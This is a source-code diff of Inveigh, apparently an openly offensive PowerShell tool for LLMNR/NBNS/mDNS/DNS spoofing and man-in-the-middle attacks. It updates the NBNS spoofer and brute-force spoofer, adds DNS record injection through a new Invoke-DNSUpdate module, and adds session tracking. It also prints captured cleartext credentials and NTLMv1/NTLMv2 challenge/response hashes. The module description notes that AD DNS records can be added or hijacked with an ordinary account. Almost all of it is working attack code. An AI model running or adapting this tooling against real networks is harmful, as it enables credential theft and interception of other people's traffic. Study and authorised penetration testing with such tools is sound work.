$NBNS_UDP_client.Client.ReceiveTimeout = 5000
@@ -3475,6 +3205,7 @@ $NBNS_spoofer_scriptblock =
$source_IP = $NBNS_listener_endpoint.Address.IPAddressToString
$NBNS_query_type = [System.BitConverter]::ToString($NBNS_request_data[43..44])
+ $NBNS_response_type = "[+]"
switch ($NBNS_query_type)
{
@@ -3552,64 +3283,30 @@ $NBNS_spoofer_scriptblock =
$NBNS_UDP_client.Close()
$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
$NBNS_UDP_client.Client.ReceiveTimeout = 5000
- $NBNS_response_message = "- response sent"
- }
- else
- {
+ $NBNS_response_message = "[spoofed response sent]"
- if($Inspect)
- {
- $NBNS_response_message = "- inspect only"
- }
- elseif($NBNSTypes -notcontains $NBNS_query_type)
- {
- $NBNS_response_message = "- disabled NBNS type"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string)
- {
- $NBNS_response_message = "- $NBNS_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string)
- {
- $NBNS_response_message = "- $NBNS_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $NBNS_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $NBNS_response_message = "- $source_IP is on ignore list"
- }
- elseif($inveigh.IP_capture_list -contains $source_IP)
+ if($inveigh.requested_host_IP_list -NotContains "$source_IP $NBNS_query_string")
{
- $NBNS_response_message = "- previous capture from $source_IP"
+ $inveigh.requested_host_IP_list.Add("$source_IP $NBNS_query_string") > $null
+ $inveigh.requested_host_list.Add($NBNS_query_string.ToLower()) > $null
}
- elseif($source_IP -eq $IP)
- {
- $NBNS_response_message = "- local request"
- }
- else
+
+ if($inveigh.DNS)
{
- $NBNS_response_message = "- something went wrong"
+ DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
}
-
+
+ }
+ else
+ {
+ $NBNS_response_message = SpooferResponseMessage -query_string $NBNS_query_string -mDNS_type ""
+ $NBNS_response_type = $NBNS_response_message[0]
+ $NBNS_response_message = $NBNS_response_message[1]
}
if($NBNS_request_data)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
- }
-
+ $inveigh.output_queue.Add("$NBNS_response_type [$(Get-Date -format s)] NBNS request $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") > $null
}
$NBNS_request_data = ""
@@ -3659,22 +3356,12 @@ $NBNS_bruteforce_spoofer_scriptblock =
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
0x00,0x00,0x00,0x00
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget") > $null
$NBNS_paused = $false
$NBNS_bruteforce_UDP_client = New-Object System.Net.Sockets.UdpClient(137)
$destination_IP = [System.Net.IPAddress]::Parse($NBNSBruteForceTarget)
$destination_point = New-Object Net.IPEndpoint($destination_IP,137)
$NBNS_bruteforce_UDP_client.Connect($destination_point)
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
- }
while($inveigh.running)
{
@@ -3684,19 +3371,8 @@ $NBNS_bruteforce_spoofer_scriptblock =
if($NBNS_paused)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Resuming NBNS brute force spoofer") > $null
$NBNS_paused = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
- }
-
}
for ($i = 0; $i -lt 255; $i++)
@@ -3710,20 +3386,9 @@ $NBNS_bruteforce_spoofer_scriptblock =
if($inveigh.hostname_spoof -and $NBNSBruteForcePause)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Pausing NBNS brute force spoofer") > $null
$NBNS_paused = $true
break NBNS_spoofer_loop
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
- }
-
}
}
@@ -3745,6 +3410,32 @@ $control_scriptblock =
$inveigh.control = $true
+ function OutputQueueLoop
+ {
+
+ while($inveigh.output_queue.Count -gt 0)
+ {
+
+ if($inveigh.console_output)
+ {
+ $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
+ }
+
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ }
+
function StopInveigh
{
param ([String]$exit_message)
@@ -3767,60 +3458,58 @@ $control_scriptblock =
}
catch
{
- $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]") > $null
+ }
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
- }
+ }
- if($inveigh.log_output)
+ if($inveigh.DNS_list.Count -gt 0)
+ {
+
+ foreach($DNS_host in $inveigh.DNS_list)
+ {
+
+ if($DNS_host.StartsWith("1,"))
{
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
+
+ $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
+
+ if($DNS_update -eq "[+] DNS update successful")
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) removed")
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) remove failed")
+ }
+
}
}
+ $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
}
- if($inveigh.running)
+ if($inveigh.relay_running)
{
Start-Sleep -S 1
- $inveigh.console_queue.Add("Inveigh exited due to $exit_message at $(Get-Date -format 's')")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
- }
-
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $exit_message") > $null
+ OutputQueueLoop
Start-Sleep -S 1
- $inveigh.running = $false
+ $inveigh.relay_running = $false
+
}
- if($inveigh.relay_running)
+ if($inveigh.running)
{
Start-Sleep -S 1
- $inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
- }
-
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $exit_message") > $null
+ OutputQueueLoop
Start-Sleep -S 1
- $inveigh.relay_running = $false
-
- }
+ $inveigh.running = $false
+ }
$inveigh.HTTPS = $false
}
@@ -3918,6 +3607,7 @@ $control_scriptblock =
}
+ OutputQueueLoop
Start-Sleep -m 5
}
@@ -3997,14 +3687,29 @@ function ProxyListener()
# Sniffer/Spoofer Startup Function
function SnifferSpoofer()
{
- $sniffer_runspace = [RunspaceFactory]::CreateRunspace()
+
+ if($inveigh.DNS)
+ {
+ $sniffer_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
+ $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
+ $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
+ $sniffer_initial_session_state.Commands.Add($DNS_update_function_entry)
+ $sniffer_runspace = [RunspaceFactory]::CreateRunspace($sniffer_initial_session_state)
+ }
+ else
+ {
+ $sniffer_runspace = [RunspaceFactory]::CreateRunspace()
+ }
+
$sniffer_runspace.Open()
$sniffer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$sniffer_powershell = [PowerShell]::Create()
$sniffer_powershell.Runspace = $sniffer_runspace
$sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $sniffer_powershell.AddScript($DNS_functions_scriptblock) > $null
$sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($IP).AddArgument($LLMNR).AddArgument(
+ $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($DNSHostsIgnore).AddArgument(
+ $DNSThreshold).AddArgument($DNSTTL).AddArgument($Evade).AddArgument($IP).AddArgument($LLMNR).AddArgument(
$LLMNR_response_message).AddArgument($LLMNRTTL).AddArgument($mDNS).AddArgument(
$mDNS_response_message).AddArgument($mDNSTypes).AddArgument($mDNSTTL).AddArgument(
$NBNS).AddArgument($NBNS_response_message).AddArgument($NBNSTypes).AddArgument($NBNSTTL).AddArgument(
@@ -4017,12 +3722,27 @@ function SnifferSpoofer()
# Unprivileged LLMNR Spoofer Startup Function
function LLMNRSpoofer()
{
+
+ if($inveigh.DNS)
+ {
+ $LLMNR_spoofer_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
+ $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
+ $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
+ $LLMNR_spoofer_initial_session_state.Commands.Add($DNS_update_function_entry)
+ $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace($LLMNR_spoofer_initial_session_state)
+ }
+ else
+ {
+ $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
+ }
+
$LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$LLMNR_spoofer_runspace.Open()
$LLMNR_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$LLMNR_spoofer_powershell = [PowerShell]::Create()
$LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace
$LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $LLMNR_spoofer_powershell.AddScript($DNS_functions_scriptblock) > $null
$LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument(
$SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
@@ -4039,6 +3759,7 @@ function mDNSSpoofer()
$mDNS_spoofer_powershell = [PowerShell]::Create()
$mDNS_spoofer_powershell.Runspace = $mDNS_spoofer_runspace
$mDNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $mDNS_spoofer_powershell.AddScript($DNS_functions_scriptblock) > $null
$mDNS_spoofer_powershell.AddScript($mDNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$mDNS_response_message).AddArgument($mDNSTTL).AddArgument($mDNSTypes).AddArgument($SpooferIP).AddArgument(
$SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument(
@@ -4049,12 +3770,27 @@ function mDNSSpoofer()
# Unprivileged NBNS Spoofer Startup Function
function NBNSSpoofer()
{
+
+ if($inveigh.DNS)
+ {
+ $NBNS_spoofer_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
+ $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
+ $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
+ $NBNS_spoofer_initial_session_state.Commands.Add($DNS_update_function_entry)
+ $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace($NBNS_spoofer_initial_session_state)
+ }
+ else
+ {
+ $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
+ }
+
$NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$NBNS_spoofer_runspace.Open()
$NBNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$NBNS_spoofer_powershell = [PowerShell]::Create()
$NBNS_spoofer_powershell.Runspace = $NBNS_spoofer_runspace
$NBNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $NBNS_spoofer_powershell.AddScript($DNS_functions_scriptblock) > $null
$NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$NBNS_response_message).AddArgument($SpooferIP).AddArgument($NBNSTypes).AddArgument(
$SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument(
@@ -4080,7 +3816,19 @@ function NBNSBruteForceSpoofer()
# Control Loop Startup Function
function ControlLoop()
{
- $control_runspace = [RunspaceFactory]::CreateRunspace()
+ if($inveigh.DNS)
+ {
+ $control_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
+ $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
+ $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
+ $control_initial_session_state.Commands.Add($DNS_update_function_entry)
+ $control_runspace = [RunspaceFactory]::CreateRunspace($control_initial_session_state)
+ }
+ else
+ {
+ $control_runspace = [RunspaceFactory]::CreateRunspace()
+ }
+
$control_runspace.Open()
$control_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$control_powershell = [PowerShell]::Create()
@@ -4150,10 +3898,7 @@ if($NBNSBruteForce -eq 'Y')
}
# Control Loop Start
-if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $NBNSBruteForcePause -or $RunCount -or $RunTime)
-{
- ControlLoop
-}
+ControlLoop
# Console Output Loop
try
@@ -4177,7 +3922,7 @@ try
switch -wildcard ($inveigh.console_queue[0])
{
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
{
if($inveigh.output_stream_only)
@@ -4258,7 +4003,7 @@ try
if($inveigh.cleartext_list.Count -gt 0)
{
- Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline)
+ Write-Output("[*] [$(Get-Date -format s)] Current unique cleartext captures:" + $inveigh.newline)
$inveigh.cleartext_list.Sort()
foreach($unique_cleartext in $inveigh.cleartext_list)
@@ -4275,12 +4020,12 @@ try
}
else
{
- Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
+ Write-Output("[+] [$(Get-Date -format s)] No cleartext credentials have been captured" + $inveigh.newline)
}
if($inveigh.POST_request_list.Count -gt 0)
{
- Write-Output("$(Get-Date -format 's') - Current unique POST request captures:" + $inveigh.newline)
+ Write-Output("[*] [$(Get-Date -format s)] Current unique POST request captures:" + $inveigh.newline)
$inveigh.POST_request_list.Sort()
foreach($unique_POST_request in $inveigh.POST_request_list)
@@ -4298,7 +4043,7 @@ try
if($inveigh.NTLMv1_list.Count -gt 0)
{
- Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
+ Write-Output("[*] [$(Get-Date -format s)] Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
$inveigh.NTLMv1_list.Sort()
foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
@@ -4315,7 +4060,7 @@ try
$unique_NTLMv1_account_last = ''
Start-Sleep -m 5
- Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
+ Write-Output("[*] [$(Get-Date -format s)] Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
{
@@ -4326,12 +4071,12 @@ try
}
else
{
- Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
+ Write-Output("[+] [$(Get-Date -format s)] No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
}
if($inveigh.NTLMv2_list.Count -gt 0)
{
- Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
+ Write-Output("[*] [$(Get-Date -format s)] Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
$inveigh.NTLMv2_list.Sort()
foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
@@ -4348,7 +4093,7 @@ try
$unique_NTLMv2_account_last = ''
Start-Sleep -m 5
- Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
+ Write-Output("[*] [$(Get-Date -format s)] Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
{
@@ -4358,7 +4103,7 @@ try
}
else
{
- Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
+ Write-Output("[+] [$(Get-Date -format s)] No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
}
$console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
@@ -4408,6 +4153,47 @@ if($inveigh)
if($inveigh.running -or $inveigh.relay_running)
{
+ if($inveigh.DNS_list.Count -gt 0)
+ {
+
+ foreach($DNS_host in $inveigh.DNS_list)
+ {
+
+ if($DNS_host.StartsWith("1,"))
+ {
+
+ $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
+
+ if($DNS_update -eq "[+] DNS update successful")
+ {
+ $output = "[+] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " removed"
+ Write-Output $output
+ }
+ else
+ {
+ $output = "[-] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " remove failed"
+ Write-Warning $output
+ }
+
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($output) > $null
+ }
+
+ }
+
+ }
+
+ $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
+ }
+
if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
{
@@ -4426,56 +4212,57 @@ if($inveigh)
}
catch
{
- Write-Output("SSL Certificate Deletion Error - Remove Manually")
+ $output = "[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]"
if($inveigh.file_output)
{
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
+ $output | Out-File $Inveigh.log_out_file -Append
}
if($inveigh.log_output)
{
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
+ $inveigh.log.Add($output) > $null
}
+ Write-Warning $output
}
}
if($inveigh.relay_running)
{
+ $output = "[*] [$(Get-Date -format s)] Inveigh Relay is exiting"
if($inveigh.file_output)
{
- "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
+ $output | Out-File $Inveigh.log_out_file -Append
}
if($inveigh.log_output)
{
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
+ $inveigh.log.Add($output) > $null
}
- Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
+ Write-Output $output
$inveigh.relay_running = $false
-
}
if($inveigh.running)
{
+ $output = "[*] [$(Get-Date -format s)] Inveigh is exiting"
if($inveigh.file_output)
{
- "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
+ $output | Out-File $Inveigh.log_out_file -Append
}
if($inveigh.log_output)
{
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
+ $inveigh.log.Add($output) > $null
}
- Write-Output("Inveigh exited at $(Get-Date -format 's')")
+ Write-Output $output
$inveigh.running = $false
-
}
$inveigh.HTTPS = $false
@@ -4483,7 +4270,7 @@ if($inveigh)
}
else
{
- Write-Output("There are no running Inveigh functions")
+ Write-Output "[-] There are no running Inveigh functions"
}
}
@@ -4499,6 +4286,12 @@ Get-Inveigh will get stored Inveigh data from memory.
.PARAMETER Console
Get queued console output. This is also the default if no parameters are set.
+.PARAMETER DNS
+Get added DNS host records.
+
+.PARAMETER DNSFailed
+Get failed DNS host record adds.
+
.PARAMETER Learning
Get valid hosts discovered through spoofer learning.
@@ -4518,7 +4311,7 @@ Get captured NTLMv1 challenge/response hashes.
Get the first captured NTLMv1 challenge/response for each unique account.
.PARAMETER NTLMv1Usernames
-Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+Get IP addresses and usernames for captured NTLMv1 challenge/response hashes.
.PARAMETER NTLMv2
Get captured NTLMv1 challenge/response hashes.
@@ -4542,6 +4335,8 @@ param
[parameter(Mandatory=$false)][Switch]$Cleartext,
[parameter(Mandatory=$false)][Switch]$CleartextUnique,
[parameter(Mandatory=$false)][Switch]$Console,
+ [parameter(Mandatory=$false)][Switch]$DNS,
+ [parameter(Mandatory=$false)][Switch]$DNSFailed,
[parameter(Mandatory=$false)][Switch]$Learning,
[parameter(Mandatory=$false)][Switch]$Log,
[parameter(Mandatory=$false)][Switch]$NTLMv1,
@@ -4552,6 +4347,7 @@ param
[parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
[parameter(Mandatory=$false)][Switch]$POSTRequest,
[parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
+ [parameter(Mandatory=$false)][Switch]$Session,
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
@@ -4572,7 +4368,7 @@ if($Console -or $PSBoundParameters.Count -eq 0)
switch -wildcard ($inveigh.console_queue[0])
{
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
{
Write-Warning $inveigh.console_queue[0]
$inveigh.console_queue.RemoveAt(0)
@@ -4592,6 +4388,36 @@ if($Console -or $PSBoundParameters.Count -eq 0)
}
+if($DNS)
+{
+
+ foreach($DNS in $inveigh.DNS_list)
+ {
+
+ if($DNS.StartsWith("1,"))
+ {
+ Write-Output $DNS.Substring(2)
+ }
+
+ }
+
+}
+
+if($DNSFailed)
+{
+
+ foreach($DNS in $inveigh.DNS_list)
+ {
+
+ if($DNS.StartsWith("0,"))
+ {
+ Write-Output $DNS.Substring(2)
+ }
+
+ }
+
+}
+
if($Log)
{
Write-Output $inveigh.log
@@ -4678,6 +4504,37 @@ if($Learning)
Write-Output $inveigh.valid_host_list
}
+if($Session)
+{
+ $i = 1
+ $session_list = @()
+
+ while($i -le $inveigh.session_socket_table.Count)
+ {
+
+ if($inveigh.session_socket_table[$i].Connected)
+ {
+ $status = "connected"
+ }
+ else
+ {
+ $status = "disconnected"
+ }
+
+ $session_object = New-Object PSObject
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $i
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name System $inveigh.session_socket_table[$i].Client.RemoteEndpoint.Address.IPaddressToString
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name User $inveigh.session_user_table[$i]
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Admin $inveigh.session_privilege_table[$i]
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Status $status
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $inveigh.session_timestamp_table[$i]
+ $session_list += $session_object
+ $i++
+ }
+
+ Write-Output $session_list | Format-Table -AutoSize
+}
+
}
function Watch-Inveigh
@@ -4702,7 +4559,7 @@ if($inveigh.tool -ne 1)
if($inveigh.running -or $inveigh.relay_running)
{
- Write-Output "Press any key to stop real time console output"
+ Write-Output "[*] Press any key to stop real time console output"
$inveigh.console_output = $true
:console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
@@ -4714,7 +4571,7 @@ if($inveigh.tool -ne 1)
switch -wildcard ($inveigh.console_queue[0])
{
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
{
Write-Warning $inveigh.console_queue[0]
$inveigh.console_queue.RemoveAt(0)
@@ -4766,13 +4623,13 @@ if($inveigh.tool -ne 1)
}
else
{
- Write-Output "Inveigh isn't running"
+ Write-Output "[-] Inveigh isn't running"
}
}
else
{
- Write-Output "Watch-Inveigh cannot be used with current external tool selection"
+ Write-Output "[-] Watch-Inveigh cannot be used with current external tool selection"
}
}
@@ -4790,11 +4647,11 @@ if($inveigh)
if(!$inveigh.running -and !$inveigh.relay_running)
{
Remove-Variable inveigh -scope global
- Write-Output "Inveigh data has been cleared from memory"
+ Write-Output "[+] Inveigh data has been cleared from memory"
}
else
{
- Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
+ Write-Output "[-] Run Stop-Inveigh before running Clear-Inveigh"
}
}
diff --git a/Inveigh.psd1 b/Inveigh.psd1
index d3e601d..5195d9d 100644
--- a/Inveigh.psd1
+++ b/Inveigh.psd1
@@ -12,7 +12,7 @@
ModuleToProcess = 'Inveigh.psm1'
# Version number of this module.
-ModuleVersion = '1.0'
+ModuleVersion = '1.4'
# ID used to uniquely identify this module
GUID = '4f991a73-c574-44b7-85df-da769f39d45d'
diff --git a/Inveigh.psm1 b/Inveigh.psm1
index 96708d8..c7b0027 100644
--- a/Inveigh.psm1
+++ b/Inveigh.psm1
@@ -1,9 +1,9 @@
<#
.SYNOPSIS
-Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool.
+Inveigh is a Windows PowerShell LLMNR/NBNS/mDNS/DNS spoofer/man-in-the-middle tool.
.LINK
https://github.com/Kevin-Robertson/Inveigh
#>
-Import-Module $PWD\Scripts\Inveigh.ps1
-Import-Module $PWD\Scripts\Inveigh-Relay.ps1 \ No newline at end of file
+Import-Module $PWD\Inveigh.ps1
+Import-Module $PWD\Inveigh-Relay.ps1 \ No newline at end of file
diff --git a/Invoke-DNSUpdate.ps1 b/Invoke-DNSUpdate.ps1
new file mode 100644
index 0000000..658d486
--- /dev/null
+++ b/Invoke-DNSUpdate.ps1
@@ -0,0 +1,1437 @@
+function Invoke-DNSUpdate
+{
+ <#
+ .SYNOPSIS
+ This function performs secure and nonsecure DNS dynamic updates against an AD domain controller. Authentication
+ for secure updates is performed through Kerberos GSS-TSIG.
+
+ Author: Kevin Robertson (@kevin_robertson)
+ License: BSD 3-Clause
+
+ .DESCRIPTION
+ This function can be used to add/delete dynamic DNS records through secure or nonsecure dynamic updates against an
+ AD domain controller. A, AAAA, CNAME, MX, PTR, SRV, and TXT records are currently supported. Invoke-DNSUpdate is modeled
+ after BIND`s nsupdate tool when using the '-g' or 'gsstsig' options for secure updates or no authentication for
+ nonsecure updates.
+
+ By default, Active Directory-integrated zones have secure dynamic updates enabled with authenticated users having
+ 'Create all child objects' permission. Records that do not exist in an AD zone can be added/deleted with a standard
+ user account. Existing records created by default or created by other users impose limitations. For example, creating
+ records that apply to the root of the zone or creating additional SRV records for kerberos/ldap will likely be blocked
+ due to existing records. Note however that older existing dynamic records can sometimes be hijacked. Subdomain folders
+ can also be created.
+
+ With secure dynamic updates, this function supports only GSS-TSIG through Kerberos AES256-CTS-HMAC-SHA1-96 using
+ two separate methods. By default, the function will have Windows perform all Kerberos steps up until the AP-REQ
+ is sent to DNS on the DC. This method will work with either the current session context or with specified credentials.
